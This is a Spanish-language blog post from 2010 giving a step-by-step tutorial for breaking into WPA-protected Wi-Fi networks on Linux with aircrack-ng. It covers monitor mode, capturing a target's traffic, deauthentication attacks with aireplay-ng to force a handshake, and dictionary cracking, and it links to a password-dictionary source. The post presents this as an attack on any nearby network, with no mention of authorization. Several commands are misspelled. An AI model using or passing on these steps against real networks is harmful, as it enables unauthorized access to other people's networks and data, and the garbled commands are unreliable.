jueves, 4 de noviembre de 2010

ROMPER UNA PROTECCIÓN WPA CON LINUX

-lo primero es tener instalado el aircrack para ello abrimos la terminal y escribimos "sudo apt-get isntall aircrack-ng" también hay k tener diccionarios de claves wpa la página: http://www.dragonjar.org/diccionarios-para-realizar-ataques-de-fuerza-bruta.xhtml

-una vez instalado iniciamos en super usuario para ello escribimos "sudo su" y una vez k eres super usuario escribes "airmon-ng start waln0" para averiguar tu interfaz ami me sale open in mon0 por lo k yo lo haré con mon0 ya k es mi interfaz.

-siguiente paso: abrimos una pestaña u otra terminal y volvemos a escribir "sudo su", despues tenemos k buscar las redes disponible y para ello escribimos "airodump-ng mon0" (mon0 seria tu interfaz) y busca las redes cercanas, una cosa a tener en cuenta es el trafico de la red lo cual se mira en las Datas k recoge sino recoge ningún Data olvidaros de esa red, después de eso le damos a Ctrl + c para parar la búsqueda.

-una vez selecionada la red escribimos "airodump-ng -w (nombre k le kieras poner ejemplo red) -c (el canal de la red) --bssid (el bsside de la red) mon0 (tu interfaz)" lo mio seria "airodump-ng -w red -c 6 --bssid 00:02:CF:DB:2B:99 mon0" en este momento empezara a coger Datas ( es necesario k coja datas)

-aireplay-ng -0 30 -a (es el bssid) -h (es la station) mon0
-aireplay-ng -0 30 -a (bssid) -c (station)
tirar los dos aireplays hasta k os salga un handskape sino os sale no la podéis capturar.
una vez ya sacado el handskape escribimos aircarck-ng -w (ruta del diccionario donde lo tengáis) red-01.cap y con ello ira provando hasta sacarla, puede ser k el diccionario k tengáis sea muy escaso y no tenga la clave porlo k no la sacará
aircrack tiene un diccionario de serie para ello se escribe "aircarck-ng -w password.lst red-01.cap
Os deseo suerte y k lo proveis y si me he confundido en algún paso pos me lo decís k lo corrijo


No hay comentarios:

Publicar un comentario